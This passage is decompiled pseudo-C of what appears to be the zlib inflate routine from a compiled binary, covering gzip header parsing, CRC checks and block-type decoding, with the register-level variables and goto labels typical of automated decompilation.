																			_t982[6] = "invalid window size";
																			 *(_t1151 + 4) = 0x3f51;
																		} else {
																			L23:
																			__eflags = _t988 -  *(_t1151 + 0x28);
																			if(_t988 >  *(_t1151 + 0x28)) {
																				goto L25;
																			} else {
																				_push(0);
																				_push(0);
																				_push(0);
																				 *(_t1151 + 0x18) = 1 << _t988;
																				_t803 = L01316A20();
																				_t1110 =  *(_t1192 + 0x1c);
																				_t1192 = _t1192 + 0xc;
																				_t982 =  *(_t1192 + 0x48);
																				 *(_t1151 + 0x1c) = _t803;
																				_t982[0xc] = _t803;
																				 *(_t1151 + 4) =  !(_t1110 >> 8) & 0x00000002 | 0x00003f3d;
																				_t1103 = 0;
																				 *(_t1192 + 0x10) = 0;
																				_t1179 = 0;
																			}
																		}
																	} else {
																		_t982 =  *(_t1192 + 0x48);
																		_t982[6] = "unknown compression method";
																		 *(_t1151 + 4) = 0x3f51;
																	}
																}
															}
														} else {
															L10:
															__eflags = _t1103 - 0x8b1f;
															if(_t1103 != 0x8b1f) {
																goto L14;
															} else {
																__eflags =  *(_t1151 + 0x28);
																if( *(_t1151 + 0x28) == 0) {
																	 *(_t1151 + 0x28) = 0xf;
																}
																_push(0);
																_push(0);
																_push(0);
																 *(_t1151 + 0x1c) = E01316CA0();
																_push(2);
																_push(_t1192 + 0x24);
																 *(_t1192 + 0x2c) = 0x8b1f;
																_push( *(_t1151 + 0x1c));
																_t806 = E01316CA0();
																_t1103 = 0;
																 *(_t1151 + 0x1c) = _t806;
																_t1192 = _t1192 + 0x18;
																 *(_t1192 + 0x10) = 0;
																_t1179 = 0;
																 *(_t1151 + 4) = 0x3f35;
																goto L177;
															}
														}
														goto L178;
													} else {
														while(1) {
															L6:
															__eflags = _t1185;
															if(_t1185 == 0) {
																goto L102;
															}
															L7:
															_t829 = ( *_t954 & 0x000000ff) << _t1179;
															_t954 =  &(_t954[1]);
															_t1103 = _t1103 + _t829;
															 *(_t1192 + 0x14) = _t954;
															_t1179 = _t1179 + 8;
															 *(_t1192 + 0x10) = _t1103;
															_t1185 = _t1185 - 1;
															__eflags = _t1179 - 0x10;
															if(_t1179 < 0x10) {
																continue;
															} else {
																_t793 =  *(_t1151 + 0xc);
																_t982 =  *(_t1192 + 0x48);
																goto L9;
															}
															goto L362;
														}
														goto L102;
													}
												} else {
													 *(_t1151 + 4) = 0x3f40;
													goto L178;
												}
												goto L362;
											case 1:
												L28:
												__eflags = __esi - 0x10;
												if(__esi >= 0x10) {
													L33:
													 *(__edi + 0x14) = __edx;
													__eflags = __dl - 8;
													if(__dl == 8) {
														L35:
														__eflags = __edx & 0x0000e000;
														if((__edx & 0x0000e000) == 0) {
															__ecx =  *(__edi + 0x24);
															__eflags = __ecx;
															if(__ecx != 0) {
																__edx = __edx >> 8;
																__eax = __edx >> 0x00000008 & 0x00000001;
																__eflags = __eax;
																 *__ecx = __eax;
															}
															L39:
															__eflags =  *(__edi + 0x14) & 0x00000200;
															if(( *(__edi + 0x14) & 0x00000200) != 0) {
																__eflags =  *(__edi + 0xc) & 0x00000004;
																if(( *(__edi + 0xc) & 0x00000004) != 0) {
																	 *(__esp + 0x18) = __dl;
																	__eax = __esp + 0x18;
																	_push(2);
																	__eflags = __edx;
																	_push(__eax);
																	 *(__esp + 0x21) = __dl;
																	_push( *(__edi + 0x1c));
																	__eax = E01316CA0();
																	__esp = __esp + 0xc;
																	 *(__edi + 0x1c) = __eax;
																}
															}
															__edx = 0;
															 *(__edi + 4) = 0x3f36;
															 *(__esp + 0x10) = 0;
															__esi = 0;
															goto L44;
														} else {
															 *(__ecx + 0x18) = "unknown header flags set";
															 *(__edi + 4) = 0x3f51;
															goto L178;
														}
													} else {
														 *(__ecx + 0x18) = "unknown compression method";
														 *(__edi + 4) = 0x3f51;
														goto L178;
													}
												} else {
													while(1) {
														L30:
														__eflags = __ebp;
														if(__ebp == 0) {
															goto L102;
														}
														L31:
														__eax =  *__ebx & 0x000000ff;
														__ecx = __esi;
														__eax = ( *__ebx & 0x000000ff) << __cl;
														__ebx = __ebx + 1;
														__edx = __edx + __eax;
														 *(__esp + 0x14) = __ebx;
														__esi = __esi + 8;
														 *(__esp + 0x10) = __edx;
														__ebp = __ebp - 1;
														__eflags = __esi - 0x10;
														if(__esi < 0x10) {
															continue;
														} else {
															__ecx =  *(__esp + 0x48);
															goto L33;
														}
														goto L362;
													}
													goto L102;
												}
												goto L362;
											case 2:
												L43:
												__eflags = __esi - 0x20;
												if(__esi >= 0x20) {
													L46:
													__eax =  *(__edi + 0x24);
													__eflags = __eax;
													if(__eax != 0) {
														 *(__eax + 4) = __edx;
													}
													__eflags =  *(__edi + 0x14) & 0x00000200;
													if(( *(__edi + 0x14) & 0x00000200) != 0) {
														__eflags =  *(__edi + 0xc) & 0x00000004;
														if(( *(__edi + 0xc) & 0x00000004) != 0) {
															__eax = __edx;
															 *(__esp + 0x18) = __dl;
															__eax = __edx >> 8;
															 *(__esp + 0x19) = __al;
															__edx = __edx >> 0x10;
															 *(__esp + 0x1a) = __al;
															__eax = __esp + 0x18;
															_push(4);
															__eflags = __edx;
															_push(__eax);
															 *(__esp + 0x23) = __dl;
															_push( *(__edi + 0x1c));
															__eax = E01316CA0();
															__esp = __esp + 0xc;
															 *(__edi + 0x1c) = __eax;
														}
													}
													__edx = 0;
													 *(__edi + 4) = 0x3f37;
													 *(__esp + 0x10) = 0;
													__esi = 0;
													goto L53;
												} else {
													while(1) {
														L44:
														__eflags = __ebp;
														if(__ebp == 0) {
															goto L102;
														}
														L45:
														__eax =  *__ebx & 0x000000ff;
														__ecx = __esi;
														__eax = ( *__ebx & 0x000000ff) << __cl;
														__ebx = __ebx + 1;
														__edx = __edx + __eax;
														 *(__esp + 0x14) = __ebx;
														__esi = __esi + 8;
														 *(__esp + 0x10) = __edx;
														__ebp = __ebp - 1;
														__eflags = __esi - 0x20;
														if(__esi < 0x20) {
															continue;
														} else {
															goto L46;
														}
														goto L362;
													}
													goto L102;
												}
												goto L362;
											case 3:
												L52:
												__eflags = __esi - 0x10;
												if(__esi >= 0x10) {
													L55:
													__ecx =  *(__edi + 0x24);
													__eflags = __ecx;
													if(__ecx != 0) {
														__eax = __dl & 0x000000ff;
														 *(__ecx + 8) = __dl & 0x000000ff;
														__ecx = __edx;
														__eax =  *(__edi + 0x24);
														__ecx = __edx >> 8;
														__eflags = __ecx;
														 *( *(__edi + 0x24) + 0xc) = __ecx;
													}
													__eflags =  *(__edi + 0x14) & 0x00000200;
													if(( *(__edi + 0x14) & 0x00000200) != 0) {
														__eflags =  *(__edi + 0xc) & 0x00000004;
														if(( *(__edi + 0xc) & 0x00000004) != 0) {
															 *(__esp + 0x18) = __dl;
															__eax = __esp + 0x18;
															_push(2);
															__eflags = __edx;
															_push(__eax);
															 *(__esp + 0x21) = __dl;
															_push( *(__edi + 0x1c));
															__eax = E01316CA0();
															__esp = __esp + 0xc;
															 *(__edi + 0x1c) = __eax;
														}
													}
													__edx = 0;
													 *(__edi + 4) = 0x3f38;
													 *(__esp + 0x10) = 0;
													__esi = 0;
													__eflags = 0;
													goto L61;
												} else {
													while(1) {
														L53:
														__eflags = __ebp;
														if(__ebp == 0) {
															goto L102;
														}
														L54:
														__eax =  *__ebx & 0x000000ff;
														__ecx = __esi;
														__eax = ( *__ebx & 0x000000ff) << __cl;
														__ebx = __ebx + 1;
														__edx = __edx + __eax;
														 *(__esp + 0x14) = __ebx;
														__esi = __esi + 8;
														 *(__esp + 0x10) = __edx;
														__ebp = __ebp - 1;
														__eflags = __esi - 0x10;
														if(__esi < 0x10) {
															continue;
														} else {
															goto L55;
														}
														goto L362;
													}
													goto L102;
												}
												goto L362;
											case 4:
												L61:
												__eflags =  *(__edi + 0x14) & 0x00000400;
												if(( *(__edi + 0x14) & 0x00000400) == 0) {
													L72:
													__eax =  *(__edi + 0x24);
													__eflags = __eax;
													if(__eax != 0) {
														 *(__eax + 0x10) = 0;
													}
													goto L74;
												} else {
													L62:
													__eflags = __esi - 0x10;
													if(__esi >= 0x10) {
														L66:
														__eax =  *(__edi + 0x24);
														 *(__edi + 0x44) = __edx;
														__eflags = __eax;
														if(__eax != 0) {
															 *(__eax + 0x14) = __edx;
														}
														__eflags =  *(__edi + 0x14) & 0x00000200;
														if(( *(__edi + 0x14) & 0x00000200) != 0) {
															__eflags =  *(__edi + 0xc) & 0x00000004;
															if(( *(__edi + 0xc) & 0x00000004) != 0) {
																 *(__esp + 0x18) = __dl;
																__eax = __esp + 0x18;
																_push(2);
																__eflags = __edx;
																_push(__eax);
																 *(__esp + 0x21) = __dl;
																_push( *(__edi + 0x1c));
																__eax = E01316CA0();
																__esp = __esp + 0xc;
																 *(__edi + 0x1c) = __eax;
															}
														}
														__ecx = 0;
														__esi = 0;
														 *(__esp + 0x10) = 0;
														L74:
														 *(__edi + 4) = 0x3f39;
														goto L75;
													} else {
														L63:
														while(1) {
															L64:
															__eflags = __ebp;
															if(__ebp == 0) {
																goto L102;
															}
															L65:
															__eax =  *__ebx & 0x000000ff;
															__ecx = __esi;
															__eax = ( *__ebx & 0x000000ff) << __cl;
															__ebx = __ebx + 1;
															__edx = __edx + __eax;
															 *(__esp + 0x14) = __ebx;
															__esi = __esi + 8;
															 *(__esp + 0x10) = __edx;
															__ebp = __ebp - 1;
															__eflags = __esi - 0x10;
															if(__esi < 0x10) {
																continue;
															} else {
																goto L66;
															}
															goto L362;
														}
														goto L102;
													}
												}
												goto L362;
											case 5:
												L75:
												__eflags =  *(__edi + 0x14) & 0x00000400;
												if(( *(__edi + 0x14) & 0x00000400) == 0) {
													L88:
													 *(__edi + 0x44) = 0;
													 *(__edi + 4) = 0x3f3a;
													goto L89;
												} else {
													L76:
													__ecx =  *(__edi + 0x44);
													__eflags = __ecx - __ebp;
													__ecx =  >  ? __ebp : __ecx;
													 *(__esp + 0x30) = __ecx;
													__eflags = __ecx;
													if(__ecx != 0) {
														__edx =  *(__edi + 0x24);
														__eflags = __edx;
														if(__edx != 0) {
															__eax =  *(__edx + 0x10);
															 *(__esp + 0x14) = __eax;
															__eflags = __eax;
															if(__eax != 0) {
																__eax =  *(__edx + 0x14);
																__eax =  *(__edx + 0x14) -  *(__edi + 0x44);
																__edx =  *(__edx + 0x18);
																 *(__esp + 0x34) = __eax;
																__eflags = __eax - __edx;
																__eax =  *(__esp + 0x34);
																if(__eflags <= 0) {
																	__edx = __ecx;
																} else {
																	__edx = __edx - __eax;
																}
																__eflags = __eax;
																__eax = E013189A0(__eax, __ebx, __edx);
																__ecx =  *(__esp + 0x3c);
															}
														}
														__eflags =  *(__edi + 0x14) & 0x00000200;
														if(( *(__edi + 0x14) & 0x00000200) != 0) {
															__eflags =  *(__edi + 0xc) & 0x00000004;
															if(( *(__edi + 0xc) & 0x00000004) != 0) {
																_push(__ecx);
																_push(__ebx);
																_push( *(__edi + 0x1c));
																__eax = E01316CA0();
																__esp = __esp + 0xc;
																 *(__edi + 0x1c) = __eax;
															}
														}
														__eax =  *(__esp + 0x30);
														__ebx = __ebx + __eax;
														__ebp = __ebp - __eax;
														 *(__esp + 0x14) = __ebx;
														_t161 = __edi + 0x44;
														 *_t161 =  *(__edi + 0x44) - __eax;
														__eflags =  *_t161;
													}
													__eflags =  *(__edi + 0x44);
													if( *(__edi + 0x44) != 0) {
														goto L102;
													} else {
														goto L88;
													}
												}
												goto L362;
											case 6:
												L89:
												__eflags =  *(__edi + 0x14) & 0x00000800;
												if(( *(__edi + 0x14) & 0x00000800) == 0) {
													L112:
													__eax =  *(__edi + 0x24);
													__eflags = __eax;
													if(__eax != 0) {
														 *(__eax + 0x1c) = 0;
													}
													goto L114;
												} else {
													L90:
													__eflags = __ebp;
													if(__ebp == 0) {
														goto L102;
													} else {
														L91:
														__ecx = 0;
														__eflags = 0;
														while(1) {
															L92:
															__eax =  *(__ecx + __ebx) & 0x000000ff;
															__ecx = __ecx + 1;
															 *(__esp + 0x30) = __eax;
															__eax =  *(__edi + 0x24);
															__eflags = __eax;
															if(__eax != 0) {
																__edx =  *(__eax + 0x1c);
																__eflags =  *(__eax + 0x1c);
																if( *(__eax + 0x1c) != 0) {
																	__edx =  *(__edi + 0x44);
																	__eflags = __edx -  *((intOrPtr*)(__eax + 0x20));
																	if(__edx <  *((intOrPtr*)(__eax + 0x20))) {
																		__eax =  *(__eax + 0x1c);
																		__ebx =  *(__esp + 0x30);
																		 *(__eax + __edx) = __bl;
																		_t178 = __edi + 0x44;
																		 *_t178 =  *(__edi + 0x44) + 1;
																		__eflags =  *_t178;
																		__ebx =  *(__esp + 0x14);
																	}
																}
															}
															__eax =  *(__esp + 0x30);
															__eflags = __eax;
															if(__eax == 0) {
																break;
															}
															L97:
															__eflags = __ecx - __ebp;
															if(__ecx < __ebp) {
																continue;
															}
															break;
														}
														L98:
														__eflags =  *(__edi + 0x14) & 0x00000200;
														 *(__esp + 0x34) = __ecx;
														if(( *(__edi + 0x14) & 0x00000200) != 0) {
															__eflags =  *(__edi + 0xc) & 0x00000004;
															if(( *(__edi + 0xc) & 0x00000004) != 0) {
																_push(__ecx);
																_push(__ebx);
																_push( *(__edi + 0x1c));
																__eax = E01316CA0();
																__ecx =  *(__esp + 0x40);
																__esp = __esp + 0xc;
																 *(__edi + 0x1c) = __eax;
																__eax =  *(__esp + 0x30);
															}
														}
														__ebx = __ebx + __ecx;
														__ebp = __ebp - __ecx;
														 *(__esp + 0x14) = __ebx;
														__eflags = __eax;
														if(__eax == 0) {
															L114:
															 *(__edi + 0x44) = 0;
															 *(__edi + 4) = 0x3f3b;
															goto L115;
														} else {
															goto L102;
														}
													}
												}
												goto L362;
											case 7:
												L115:
												__eflags =  *(__edi + 0x14) & 0x00001000;
												if(( *(__edi + 0x14) & 0x00001000) == 0) {
													L129:
													__eax =  *(__edi + 0x24);
													__eflags = __eax;
													if(__eax != 0) {
														 *(__eax + 0x24) = 0;
													}
													goto L131;
												} else {
													L116:
													__eflags = __ebp;
													if(__ebp == 0) {
														goto L102;
													} else {
														L117:
														__ecx = 0;
														__eflags = 0;
														while(1) {
															L118:
															__eax =  *(__ecx + __ebx) & 0x000000ff;
															__ecx = __ecx + 1;
															 *(__esp + 0x30) = __eax;
															__eax =  *(__edi + 0x24);
															__eflags = __eax;
															if(__eax != 0) {
																__edx =  *(__eax + 0x24);
																__eflags =  *(__eax + 0x24);
																if( *(__eax + 0x24) != 0) {
																	__edx =  *(__edi + 0x44);
																	__eflags = __edx -  *((intOrPtr*)(__eax + 0x28));
																	if(__edx <  *((intOrPtr*)(__eax + 0x28))) {
																		__eax =  *(__eax + 0x24);
																		__ebx =  *(__esp + 0x30);
																		 *(__eax + __edx) = __bl;
																		_t229 = __edi + 0x44;
																		 *_t229 =  *(__edi + 0x44) + 1;
																		__eflags =  *_t229;
																		__ebx =  *(__esp + 0x14);
																	}
																}
															}
															__eax =  *(__esp + 0x30);
															__eflags = __eax;
															if(__eax == 0) {
																break;
															}
															L123:
															__eflags = __ecx - __ebp;
															if(__ecx < __ebp) {
																continue;
															}
															break;
														}
														L124:
														__eflags =  *(__edi + 0x14) & 0x00000200;
														 *(__esp + 0x34) = __ecx;
														if(( *(__edi + 0x14) & 0x00000200) != 0) {
															__eflags =  *(__edi + 0xc) & 0x00000004;
															if(( *(__edi + 0xc) & 0x00000004) != 0) {
																_push(__ecx);
																_push(__ebx);
																_push( *(__edi + 0x1c));
																__eax = E01316CA0();
																__ecx =  *(__esp + 0x40);
																__esp = __esp + 0xc;
																 *(__edi + 0x1c) = __eax;
																__eax =  *(__esp + 0x30);
															}
														}
														__ebx = __ebx + __ecx;
														__ebp = __ebp - __ecx;
														 *(__esp + 0x14) = __ebx;
														__eflags = __eax;
														if(__eax != 0) {
															goto L102;
														} else {
															L128:
															L131:
															__edx =  *(__esp + 0x10);
															 *(__edi + 4) = 0x3f3c;
															goto L132;
														}
													}
												}
												goto L362;
											case 8:
												L132:
												__eflags =  *(__edi + 0x14) & 0x00000200;
												if(( *(__edi + 0x14) & 0x00000200) == 0) {
													L140:
													__ecx =  *(__edi + 0x24);
													__eflags = __ecx;
													if(__ecx != 0) {
														 *(__edi + 0x14) =  *(__edi + 0x14) >> 9;
														__eax =  *(__edi + 0x14) >> 0x00000009 & 0x00000001;
														__eflags = __eax;
														 *(__ecx + 0x2c) = __eax;
														__eax =  *(__edi + 0x24);
														 *((intOrPtr*)( *(__edi + 0x24) + 0x30)) = 1;
													}
													_push(0);
													_push(0);
													_push(0);
													__eax = E01316CA0();
													__ecx =  *(__esp + 0x54);
													__esp = __esp + 0xc;
													__edx =  *(__esp + 0x10);
													 *(__edi + 0x1c) = __eax;
													 *(__ecx + 0x30) = __eax;
													 *(__edi + 4) = 0x3f3f;
													goto L178;
												} else {
													L133:
													__eflags = __esi - 0x10;
													if(__esi >= 0x10) {
														L136:
														__eflags =  *(__edi + 0xc) & 0x00000004;
														if(( *(__edi + 0xc) & 0x00000004) == 0) {
															L139:
															__ecx = 0;
															__esi = 0;
															__eflags = 0;
															 *(__esp + 0x10) = 0;
															goto L140;
														} else {
															L137:
															__eax =  *(__edi + 0x1c) & 0x0000ffff;
															__eflags = __edx - ( *(__edi + 0x1c) & 0x0000ffff);
															if(__edx == ( *(__edi + 0x1c) & 0x0000ffff)) {
																goto L139;
															} else {
																L138:
																__ecx =  *(__esp + 0x48);
																 *(__ecx + 0x18) = "header crc mismatch";
																 *(__edi + 4) = 0x3f51;
															}
														}
														goto L178;
													} else {
														while(1) {
															L134:
															__eflags = __ebp;
															if(__ebp == 0) {
																goto L102;
															}
															L135:
															__eax =  *__ebx & 0x000000ff;
															__ecx = __esi;
															__eax = ( *__ebx & 0x000000ff) << __cl;
															__ebx = __ebx + 1;
															__edx = __edx + __eax;
															 *(__esp + 0x14) = __ebx;
															__esi = __esi + 8;
															 *(__esp + 0x10) = __edx;
															__ebp = __ebp - 1;
															__eflags = __esi - 0x10;
															if(__esi < 0x10) {
																continue;
															} else {
																goto L136;
															}
															goto L362;
														}
														goto L102;
													}
												}
												goto L362;
											case 9:
												L143:
												__eflags = __esi - 0x20;
												if(__esi >= 0x20) {
													L147:
													__ecx = __edx;
													__edx = __edx << 0x10;
													__edx & 0x0000ff00 = (__edx & 0x0000ff00) + (__edx << 0x10);
													__edx = __edx >> 8;
													__ecx = (__edx & 0x0000ff00) + (__edx << 0x10) << 8;
													__eax = __edx >> 0x00000008 & 0x0000ff00;
													__eax = (__edx >> 0x00000008 & 0x0000ff00) + ((__edx & 0x0000ff00) + (__edx << 0x10) << 8);
													__edx = __edx >> 0x18;
													__ecx =  *(__esp + 0x48);
													__eax = __eax + __edx;
													__edx = 0;
													 *(__edi + 0x1c) = __eax;
													 *(__esp + 0x10) = 0;
													__esi = 0;
													__eflags = 0;
													 *(__ecx + 0x30) = __eax;
													 *(__edi + 4) = 0x3f3e;
													goto L148;
												} else {
													L144:
													asm("o16 nop [eax+eax]");
													while(1) {
														L145:
														__eflags = __ebp;
														if(__ebp == 0) {
															goto L102;
														}
														L146:
														__eax =  *__ebx & 0x000000ff;
														__ecx = __esi;
														__eax = ( *__ebx & 0x000000ff) << __cl;
														__ebx = __ebx + 1;
														__edx = __edx + __eax;
														 *(__esp + 0x14) = __ebx;
														__esi = __esi + 8;
														 *(__esp + 0x10) = __edx;
														__ebp = __ebp - 1;
														__eflags = __esi - 0x20;
														if(__esi < 0x20) {
															continue;
														} else {
															goto L147;
														}
														goto L362;
													}
													goto L102;
												}
												goto L362;
											case 0xa:
												L148:
												__eflags =  *(__edi + 0x10);
												if( *(__edi + 0x10) == 0) {
													L338:
													__eax =  *(__esp + 0x20);
													 *(__ecx + 0xc) =  *(__esp + 0x20);
													__eax =  *(__esp + 0x1c);
													 *(__ecx + 0x10) =  *(__esp + 0x1c);
													__eax = 2;
													 *__ecx = __ebx;
													 *(__ecx + 4) = __ebp;
													 *(__edi + 0x40) = __esi;
													_pop(__esi);
													_pop(__ebp);
													_pop(__ebx);
													 *(__edi + 0x3c) = __edx;
													_pop(__edi);
													__esp = __esp + 0x34;
													return 2;
												} else {
													L149:
													_push(0);
													_push(0);
													_push(0);
													__eax = L01316A20();
													__ecx =  *(__esp + 0x54);
													__esp = __esp + 0xc;
													__edx =  *(__esp + 0x10);
													 *(__edi + 0x1c) = __eax;
													 *(__ecx + 0x30) = __eax;
													 *(__edi + 4) = 0x3f3f;
													goto L150;
												}
												goto L362;
											case 0xb:
												L150:
												__eax =  *(__esp + 0x4c);
												__eflags = __eax - 5;
												if(__eax == 5) {
													L345:
													__edi =  *(__esp + 0x10);
													__edx = __eax;
													goto L104;
												} else {
													L151:
													__eflags = __eax - 6;
													if(__eax == 6) {
														goto L345;
													} else {
														goto L152;
													}
												}
												goto L362;
											case 0xc:
												L152:
												__eflags =  *(__edi + 8);
												if( *(__edi + 8) == 0) {
													L154:
													__eflags = __esi - 3;
													if(__esi >= 3) {
														L157:
														__eax = __edx;
														__edx = __edx >> 1;
														 *(__edi + 8) = __eax;
														__edx = __edx & 0x00000003;
														switch( *((intOrPtr*)((__edx & 0x00000003) * 4 +  &M013165DC))) {
															case 0:
																L158:
																 *(__edi + 4) = 0x3f41;
																goto L159;
															case 1:
																L160:
																__eflags =  *(__esp + 0x4c) - 6;
																 *((intOrPtr*)(__edi + 0x50)) = 0x1331a30;
																 *(__edi + 0x58) = 9;
																 *((intOrPtr*)(__edi + 0x54)) = 0x1332230;
																 *((intOrPtr*)(__edi + 0x5c)) = 5;
																 *(__edi + 4) = 0x3f47;
																if( *(__esp + 0x4c) != 6) {
																	L159:
																	__ecx =  *(__esp + 0x48);
																	__edx = __edx >> 2;
																	__esi = __esi - 3;
																	 *(__esp + 0x10) = __edx;
																	goto L178;
																} else {
																	L161:
																	__edx = __edx >> 2;
																	__esi = __esi - 3;
																	 *(__esp + 0x10) = __edx;
																	goto L102;
																}
																goto L362;
															case 2:
																L162:
																__ecx =  *(__esp + 0x48);
																__edx = __edx >> 2;
																__esi = __esi - 3;
																 *(__edi + 4) = 0x3f44;
																 *(__esp + 0x10) = __edx;
																goto L178;
															case 3:
																L163:
																__ecx =  *(__esp + 0x48);
																__edx = __edx >> 2;
																__esi = __esi - 3;
																 *(__esp + 0x10) = __edx;
																 *(__ecx + 0x18) = "invalid block type";
																 *(__edi + 4) = 0x3f51;
																goto L178;
														}
													} else {
														while(1) {
															L155:
															__eflags = __ebp;
															if(__ebp == 0) {
																goto L102;
															}
															L156:
															__eax =  *__ebx & 0x000000ff;
															__ecx = __esi;
															__eax = ( *__ebx & 0x000000ff) << __cl;
															__ebx = __ebx + 1;
															__edx = __edx + __eax;
															 *(__esp + 0x14) = __ebx;
															__esi = __esi + 8;
															 *(__esp + 0x10) = __edx;
															__ebp = __ebp - 1;
															__eflags = __esi - 3;
															if(__esi < 3) {
																continue;
															} else {
																goto L157;
															}
															goto L362;
														}
														goto L102;
													}
												} else {
													L153:
													__ecx = __esi;
													 *(__edi + 4) = 0x3f4e;
													__ecx = __esi & 0x00000007;
													__edx = __edx >> __cl;
													__esi = __esi - __ecx;
													 *(__esp + 0x10) = __edx;
													goto L177;
												}
												goto L362;
											case 0xd:
												L164:
												__esi = __esi & 0x00000007;
												__edx = __edx >> __cl;
												__esi = __esi - (__esi & 0x00000007);
												 *(__esp + 0x10) = __edx;
												__eflags = __esi - 0x20;
												if(__esi >= 0x20) {
													L168:
													__eax = __edx;
													__ecx = __dx & 0x0000ffff;
													 !__edx =  !__edx >> 0x10;
													__eflags = __ecx -  !__edx >> 0x10;
													if(__ecx ==  !__edx >> 0x10) {
														L170:
														__edx = 0;
														 *(__edi + 0x44) = __ecx;
														__esi = 0;
														 *(__esp + 0x10) = 0;
														__eflags =  *(__esp + 0x4c) - 6;
														 *(__edi + 4) = 0x3f42;
														if( *(__esp + 0x4c) == 6) {
															L344:
															__edi = 0;
															goto L103;
														} else {
															L171:
															__ecx =  *(__esp + 0x48);
															goto L172;
														}
													} else {
														L169:
														__ecx =  *(__esp + 0x48);
														 *(__ecx + 0x18) = "invalid stored block lengths";
														 *(__edi + 4) = 0x3f51;
														goto L178;
													}
												} else {
													L165:
													while(1) {
														L166:
														__eflags = __ebp;
														if(__ebp == 0) {
															goto L102;
														}
														L167:
														__eax =  *__ebx & 0x000000ff;
														__ecx = __esi;
														__eax = ( *__ebx & 0x000000ff) << __cl;
														__ebx = __ebx + 1;
														__edx = __edx + __eax;
														 *(__esp + 0x14) = __ebx;
														__esi = __esi + 8;
														 *(__esp + 0x10) = __edx;
														__ebp = __ebp - 1;
														__eflags = __esi - 0x20;
														if(__esi < 0x20) {
															continue;
														} else {
															goto L168;
														}
														goto L362;
													}
													goto L102;
												}
												goto L362;
											case 0xe:
												L172:
												 *(__edi + 4) = 0x3f43;
												goto L173;
											case 0xf:
												L173:
												__eax =  *(__edi + 0x44);
												__eflags = __eax;
												if(__eax == 0) {
													L180:
													 *(__edi + 4) = 0x3f3f;
													goto L178;
												} else {
													L174:
													__eflags = __eax - __ebp;
													__eax =  >  ? __ebp : __eax;
													__eflags = __eax -  *(__esp + 0x1c);
													__eax =  >  ?  *(__esp + 0x1c) : __eax;
													 *(__esp + 0x34) = __eax;
													__eflags = __eax;
													if(__eax == 0) {
														goto L102;
													} else {
														L175:
														__eax = E013189A0( *(__esp + 0x28), __ebx, __eax);
														__eax =  *(__esp + 0x40);
														 *(__esp + 0x1c) =  *(__esp + 0x1c) - __eax;
														__ebx = __ebx + __eax;
														 *(__esp + 0x20) =  *(__esp + 0x20) + __eax;
														__ebp = __ebp - __eax;
														_t333 = __edi + 0x44;
														 *_t333 =  *(__edi + 0x44) - __eax;
														__eflags =  *_t333;
														 *(__esp + 0x14) = __ebx;
														goto L176;
													}
												}
												goto L362;
											case 0x10:
												goto L0;
											case 0x11:
												goto L187;
											case 0x12:
												L200:
												__eflags =  *(_t1151 + 0x6c) -  *((intOrPtr*)(_t1151 + 0x68)) +  *((intOrPtr*)(_t1151 + 0x64));
												if( *(_t1151 + 0x6c) >=  *((intOrPtr*)(_t1151 + 0x68)) +  *((intOrPtr*)(_t1151 + 0x64))) {
													L235:
													__eflags =  *(_t1151 + 4) - 0x3f51;
													if( *(_t1151 + 4) == 0x3f51) {
														L176:
														_t1103 =  *(_t1192 + 0x10);
														goto L177;
													} else {
														L236:
														__eflags =  *((short*)(_t1151 + 0x274));
														if( *((short*)(_t1151 + 0x274)) != 0) {
															L239:
															_t838 = _t1151 + 0x534;
															 *(_t1151 + 0x58) = 9;
															 *(_t1151 + 0x50) = _t838;
															 *(_t1151 + 0x70) = _t838;
															_t841 = E01316F90(1, _t1151 + 0x74,  *((intOrPtr*)(_t1151 + 0x64)), _t1151 + 0x70, _t1151 + 0x58, _t1151 + 0x2f4);
															_t1192 = _t1192 + 0x18;
															 *(_t1192 + 0x2c) = _t841;
															__eflags = _t841;
															if(_t841 == 0) {
																L241:
																 *(_t1151 + 0x54) =  *(_t1151 + 0x70);
																 *(_t1151 + 0x5c) = 6;
																_t847 = E01316F90(2, _t1151 + ( *((intOrPtr*)(_t1151 + 0x64)) + 0x3a) * 2,  *((intOrPtr*)(_t1151 + 0x68)), _t1151 + 0x70, _t1151 + 0x5c, _t1151 + 0x2f4);
																_t1192 = _t1192 + 0x18;
																 *(_t1192 + 0x2c) = _t847;
																__eflags = _t847;
																if(_t847 == 0) {
																	L243:
																	_t1108 =  *((intOrPtr*)(_t1192 + 0x4c));
																	 *(_t1151 + 4) = 0x3f47;
																	__eflags = _t1108 - 6;
																	if(_t1108 == 6) {
																		L343:
																		_t1152 =  *(_t1192 + 0x10);
																		goto L104;
																	} else {
																		L244:
																		_t1118 =  *(_t1192 + 0x10);
																		_t999 =  *(_t1192 + 0x48);
																		goto L245;
																	}
																} else {
																	L242:
																	_t982 =  *(_t1192 + 0x48);
																	_t1103 =  *(_t1192 + 0x10);
																	_t982[6] = "invalid distances set";
																	 *(_t1151 + 4) = 0x3f51;
																	goto L178;
																}
															} else {
																L240:
																_t982 =  *(_t1192 + 0x48);
																_t1103 =  *(_t1192 + 0x10);
																_t982[6] = "invalid literal/lengths set";
																 *(_t1151 + 4) = 0x3f51;
																goto L178;
															}
														} else {
															L237:
															_t982 =  *(_t1192 + 0x48);
															_t1103 =  *(_t1192 + 0x10);
															_t982[6] = "invalid code -- missing end-of-block";
															 *(_t1151 + 4) = 0x3f51;
															goto L178;
														}
													}
												} else {
													L201:
													_t1152 =  *(_t1192 + 0x10);
													do {
														L202:
														_t916 =  *( *((intOrPtr*)( *((intOrPtr*)(_t1192 + 0x24)) + 0x50)) + ((0x00000001 <<  *( *(_t1192 + 0x3c))) - 0x00000001 & _t1152) * 4);
														 *(_t1192 + 0x34) = _t916;
														__eflags = (_t916 >> 0x00000008 & 0x000000ff) - _t1179;
														if((_t916 >> 0x00000008 & 0x000000ff) <= _t1179) {
															L206:
															_t1138 = _t916 >> 0x10;
															__eflags = _t1138 - 0x10;
															if(__eflags >= 0) {
																L208:
																if(__eflags != 0) {
																	L215:
																	__eflags =  *(_t1192 + 0x36) - 0x11;
																	_t1139 =  *(_t1192 + 0x10);
																	_t1080 = _t916 & 0x000000ff;
																	if( *(_t1192 + 0x36) != 0x11) {
																		L222:
																		_t1177 = _t1080 + 7;
																		 *(_t1192 + 0x34) = _t1080;
																		__eflags = _t1179 - _t1177;
																		if(_t1179 >= _t1177) {
																			L227:
																			_t1140 = _t1139 >> _t1080;
																			_t1103 = _t1140 >> 7;
																			__eflags = _t1103;
																			 *(_t1192 + 0x30) = (_t1140 & 0x0000007f) + 0xb;
																			_t920 = 0xfffffff9;
																			goto L228;
																		} else {
																			L223:
																			while(1) {
																				L224:
																				__eflags = _t1185;
																				if(_t1185 == 0) {
																					goto L102;
																				}
